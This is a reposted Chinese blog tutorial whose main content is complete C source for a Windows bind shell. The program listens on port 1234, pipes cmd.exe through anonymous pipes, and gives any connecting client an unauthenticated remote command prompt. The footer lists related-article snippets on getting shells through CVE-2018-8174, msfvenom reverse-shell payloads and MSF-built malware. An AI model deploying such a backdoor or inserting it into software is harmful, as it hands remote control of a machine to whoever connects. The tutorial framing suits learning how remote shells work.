获取Windows Shell的简单示例程序<二>

最新推荐文章于 2024-03-11 16:36:29 发布
最新推荐文章于 2024-03-11 16:36:29 发布
阅读量153 收藏
点赞数
文章标签: shell 操作系统
原文链接:http://www.cnblogs.com/cmleung/archive/2009/09/23/1572279.html
版权
      程序基本流程:
      1,创建服务端Socket,端口绑定,监听。
            这也是一般的socket程序的处理流程。
      2,启动循环并在循环体中接收客户端请求并返回客户端套接字。
      3,启动子线程处理当前连接。在子线程中进行cmd子进程的创建及数据的发送和接受。其中子进程的输入输出重定向如下:
      
                      
      3.1,创建读写管道.
      
      3.2,创建cmd子进程,将设置cmd的输入输出句柄为管道句柄.
      
      未完待续. 
      程序代码:
ContractedBlock.gif ExpandedBlockStart.gif Code
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32");

//线程参数
ExpandedBlockStart.gifContractedBlock.gifstruct THREADPARAM{
    SOCKET socket;//客户端连接套接字.
    HANDLE hReadShell;//shell的读管道句柄.
    HANDLE hWriteShell;//shell的写管道句柄.
};
//接收线程
DWORD WINAPI RecvFunc(LPVOID lpParam);
//发送线程
DWORD WINAPI SendFunc(LPVOID lpParam);

void main()
ExpandedBlockStart.gifContractedBlock.gif{
    WSADATA wsaData;
    int err;
    err=WSAStartup(MAKEWORD(2,2),&wsaData);
ExpandedSubBlockStart.gifContractedSubBlock.gif    if(err != 0){
        printf("WSAStartup failed\r\n");
        return;
    }
    if(LOBYTE(wsaData.wVersion) != 2||
ExpandedSubBlockStart.gifContractedSubBlock.gif        HIBYTE(wsaData.wVersion) != 2){
        WSACleanup();
        return;
    }
    //创建服务端套接字
    SOCKET sockSrv=socket(AF_INET,SOCK_STREAM,0);
    SOCKADDR_IN addrSrv;
    addrSrv.sin_addr.S_un.S_addr=htonl(INADDR_ANY);
    addrSrv.sin_family=AF_INET;
    addrSrv.sin_port=htons(1234);
    //绑定端口
    bind(sockSrv,(SOCKADDR *)&addrSrv,sizeof(SOCKADDR));
    //监听
    listen(sockSrv,5);
ExpandedSubBlockStart.gifContractedSubBlock.gif    while(1){
        SOCKADDR_IN addrClient;
        int len=sizeof(SOCKADDR);
        SOCKET sockClient=accept(sockSrv,(SOCKADDR *)&addrClient,&len);
ExpandedSubBlockStart.gifContractedSubBlock.gif        if(sockClient == INVALID_SOCKET){
            printf("Invalid client socket!\r\n");
            break;
        }
        //安全属性
        SECURITY_ATTRIBUTES sa;
        sa.nLength=sizeof(SECURITY_ATTRIBUTES);
        sa.bInheritHandle=TRUE;
        sa.lpSecurityDescriptor=NULL;
        HANDLE hReadPipe,hWritePipe;
        HANDLE hWriteShell,hReadShell;
        //创建管道
ExpandedSubBlockStart.gifContractedSubBlock.gif        if(!CreatePipe(&hReadPipe,&hWriteShell,&sa,NULL)){
            printf("Create anomyous pipe failed!\r\n");
            break;
        };
ExpandedSubBlockStart.gifContractedSubBlock.gif        if(!CreatePipe(&hReadShell,&hWritePipe,&sa,NULL)){
            printf("Create anomyous pipe failed!\r\n");
            break;
        };
        
        //设置启动参数并启动shell子进程
        STARTUPINFO startupInfo;
        ZeroMemory(&startupInfo,sizeof(STARTUPINFO));
        startupInfo.cb=sizeof(STARTUPINFO);
        startupInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
        startupInfo.hStdInput =hReadPipe;
        startupInfo.hStdOutput=hWritePipe;
        startupInfo.hStdError = hWritePipe;
        startupInfo.wShowWindow=SW_SHOW;
        PROCESS_INFORMATION pi;
        CreateProcess(NULL,"cmd",NULL,NULL,
            TRUE,0,NULL,NULL,&startupInfo,&pi);
        DWORD threadId1,threadId2;
        THREADPARAM tp;
        tp.socket=sockClient;
        tp.hReadShell=hReadShell;
        tp.hWriteShell=hWriteShell;
        HANDLE h1=CreateThread(NULL,0,RecvFunc,(LPVOID)&tp,NULL,&threadId1);
        HANDLE h2=    CreateThread(NULL,0,SendFunc,(LPVOID)&tp,NULL,&threadId2);
        //WaitForSingleObject(h1,INFINITE);
        //WaitForSingleObject(h2,INFINITE);
    }
    closesocket(sockSrv);
    WSACleanup();
    return ;
}



ExpandedBlockStart.gifContractedBlock.gifDWORD WINAPI RecvFunc(LPVOID lpParam){
    THREADPARAM *pParam=(THREADPARAM *)lpParam;
    char buf[4096];
ExpandedSubBlockStart.gifContractedSubBlock.gif    while(1){
ExpandedSubBlockStart.gifContractedSubBlock.gif        if(pParam->socket == INVALID_SOCKET){
            return 0;
        }
        memset(buf,0,4096);
        DWORD dwRecvLen=recv(pParam->socket,buf,100,0);
ExpandedSubBlockStart.gifContractedSubBlock.gif        if(dwRecvLen <= 0){
            closesocket(pParam->socket);
            pParam->socket=INVALID_SOCKET;
            return 0;
        }
        DWORD dwBytesWritten;
        WriteFile(pParam->hWriteShell,buf,dwRecvLen,&dwBytesWritten,0);
        printf("In RecvFunc:\nsocket=0x%08x\r\n",pParam->socket);
        printf("Write %d bytes:%s,%d bytes writen actually\r\n",dwRecvLen,buf,dwBytesWritten);
    }

    return 0;
}

ExpandedBlockStart.gifContractedBlock.gifDWORD WINAPI SendFunc(LPVOID lpParam){
    THREADPARAM *pParam=(THREADPARAM *)lpParam;
    char buf[4096];
ExpandedSubBlockStart.gifContractedSubBlock.gif    while(1){
        if(pParam->socket == INVALID_SOCKET)
            return 0;
        memset(buf,0,4096);
        DWORD dwRead=0;
        ReadFile(pParam->hReadShell,buf,100,&dwRead,0);
ExpandedSubBlockStart.gifContractedSubBlock.gif        if(dwRead != 0){
            int ret=send(pParam->socket,buf,dwRead+1,0);
            printf("In SendFunc:\nsocket=0x%08x\r\n",pParam->socket);
            printf("Read %d bytes:%s\r\nSend",dwRead,buf);
        }

    }

    return 0;
}
      程序在处理客户端断开连接时还未加处理.欢迎读者给我提出一些意见和建议.

转载于:https://www.cnblogs.com/cmleung/archive/2009/09/23/1572279.html

weixin_30780221
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell
Cwillchris的博客
05-27 692
一、 利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) CVE-2018-8174脚本 实验步骤: 1、xshell上传 CVE-2018-8174 的 EXP 到 Kali 2、解压 CVE-2018-8174 并进入该目录 3、利用EXP生成恶意html文件,并放到/var/www/html,为了让目标机访问 python2
获取Windows Shell简单示例程序(一)
weixin_30565199的博客
07-30 385
昨天看了黑防2009年VC专辑上RITATV的一篇文章<编程实现远程shell获取>,对Windows shell获取总算是有了一个概念.在此作下整理,希望能给像我一样的菜鸟们提供一些参考.知识点:一,匿名管道.匿名管道是一个未命名的单向管道,通常在一个父进程和一个进程之间传输数据.匿名管道只能实现本机上的两个进程之间的通信,而不能...
Shell脚本
Zhangshengjun_的博客
03-01 196
shell脚本命令的两种工作方式 交互式:用户输入一条命令就立即执行一条。 批处理:由用户事先编写好一个完整的Shell脚本,Shell会一次性执行多行命令。 1.编写简单的脚本 创建一个example.sh的脚本(.sh代表脚本文件) 第一行的脚本声明(#!)用来告诉系统使用哪种Shell解释器来执行脚本。 第行为注释信息,提高可读性。 第三、四就是脚本命令。 第一种执行脚本方式 第...
Windows客户端 SSH 远程连接Windows服务器(PowerShell Server)-个人成功经历
wqy88的博客
03-22 4049
首先是参考了该文章https://blog.csdn.net/nijiayy/article/details/51147475,其中教程已经很详细了,但是有几点补充: 一、下载地址 PowerShell Server的:https://www.nsoftware.com/download/getfile.aspx putty的: https://www.chiark.greenend.org.uk...
【土木人自学网安Day6】shell及多种获取shell的方式
最新发布
qq_44117967的博客
03-11 2159
主要介绍:shell的基本概念,各类获取shell的工具,获取shell的payload生成器使用,获取加密shell免杀的方法、shell稳定化的办法......
shell】练习- 菜单选择 - select - case
...
05-29 359
#!/bin/sh # select && case in this script echo "请选择你使用的操作系统" select os in MacOS Linux Windows Unix do case $os in Linux | Unix ) echo "使用的是高级操作系统哦" ;; Windows ) echo "使用的是微软的操作系统" ;; MacOS ) .
shell线程
陈贤鹏的博客
08-15 584
使用&amp;和wait结合   #!/bin/bash for ((i=0;i&lt;10;i++));do { sleep 3; echo "sleep" } &amp;         #{}内的命令放在后台执行 done wait      #等待线程结束
Linux进程(四):线程
Acmery的小黑屋
08-11 267
Linux进程(四):线程前言线程的概念内核线程轻量级进程LWP用户线程区别关于pthread线程库LinuxThread线程ID和进程ID的问题信号处理问题线程总数问题管理线程问题同步问题其他POSIX兼容性问题实时性问题NPTL伪装reference   前言 ​   在记录这篇博客之前,针对pthread_create函数创建的线程,网上的说法不一,有人说是用户级线程,有人说是LWP。在我亲自实验后发现,由pthread_create创建出来的线程是一个轻量级进程,只不过在这个机制上,Linux 2
操作系统实验】---shell、多线程、信号量实验报告
zijin-jdd的博客
06-12 606
实现shell程序,要求支持基本命令、重定向命令、管道命令、后台命令。基本操作的执行,如果是cd操作就直接退出,pwd操作使用getcwd获取路径,其他的命令使用execvp装入程序 管道操作,左树的输出重定向到管道的写端,右树的输入重定向到管道的读端。 重定向操作,第一个孩的token为“”,打开文件写;为“>>”,打开文件追加。 执行代码 mian函数,循环接收输出的指令,根据指令构建语法树,exit指令就结束程序,cd指令就调用chdir,其他指令使用进程调用exec,......
shell 实现进程多任务,进程高并发
m0_61066945的博客
06-20 1324
shell实现高并发、shell进程随主进程退出而退出、shell强制停止进程
shell脚本.example
cywdeboke的博客
06-22 632
1.#!/bin/bash a="hello   world" NUM=2 echo  "a is :$a NUM is : ${NUM}nd 结果: 2.Q:切换工作目录至/tmp,依次向/tmp目录中每个文件问好,统计/tmp下有多少个文件并显示出来 #!/bin/bash cd   /tmp for      i   in   /tmp/* do      ec
Powershell 获取用户输入
小鹰信息技术服务部
03-09 2923
有个场景,需要在powershell获取用户的输入,然后进行下一步。 使用 Read-Host可以实现这种效果,脚本如下: $ID = Read-Host "Please enter ID" # use $ID to do something... ... ...
获取Shell后的操作
墨鱼菜鸡
06-21 1033
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。 Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢? 第一步,先whoami 查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得...
利用msf在windows下反弹shell
Jiajiajiang_的博客
08-08 7114
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell, 命令:msfvenom -p windows/meterpreter...
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1089
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 、MSF监听 三、效果检验 (一)MSF监听结果 ()恶意软件扫描
运行Dos命令并得到dos的输出文本
henreash的专栏
12-22 3849
function RunDOS(const CommandLine: string): string; var   HRead, HWrite: THandle;   StartInfo: TStartupInfo;   ProceInfo: TProcessInformation;   b: Boolean;   sa: TSecurityAttributes;   inS: TH
shell基础---Shell 获得用户输入
会哭的雨@的博客
09-24 5059
在 Bash 下我们可以通过其内部命令 read 接收用户来自键盘的输入,并可以将输入的内容赋值给一个变量。 实例:基本的读取 read 命令比较常用的语法格式如下所示: read [-p prompt] [variable1 variable2...] -p 选项用于在尝试读取任何输入之前,显示 prompt(提示信息)的内容到标准错误输出。我们一般使用这一选项来指定提示用户输入哪些内容的信息。read 命令会每次从标准输入(或使用 -u 选项指定的文件描述符中)读取一行的内容,它会将第一个单
Windows Shell编程之如何编写为文件对象弹出信息框的Shell扩展
weixin_33869377的博客
02-22 261
有关COM编程资料 转载:http://www.cnblogs.com/lzjsky/archive/2010/11/22/1884702.html 活动桌面引入一项新特性, 当你在某些特定对象上旋停鼠标时,工具提示将显示它们的描述 例如对TXT格式文件: 系统默认的:                                                            扩...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值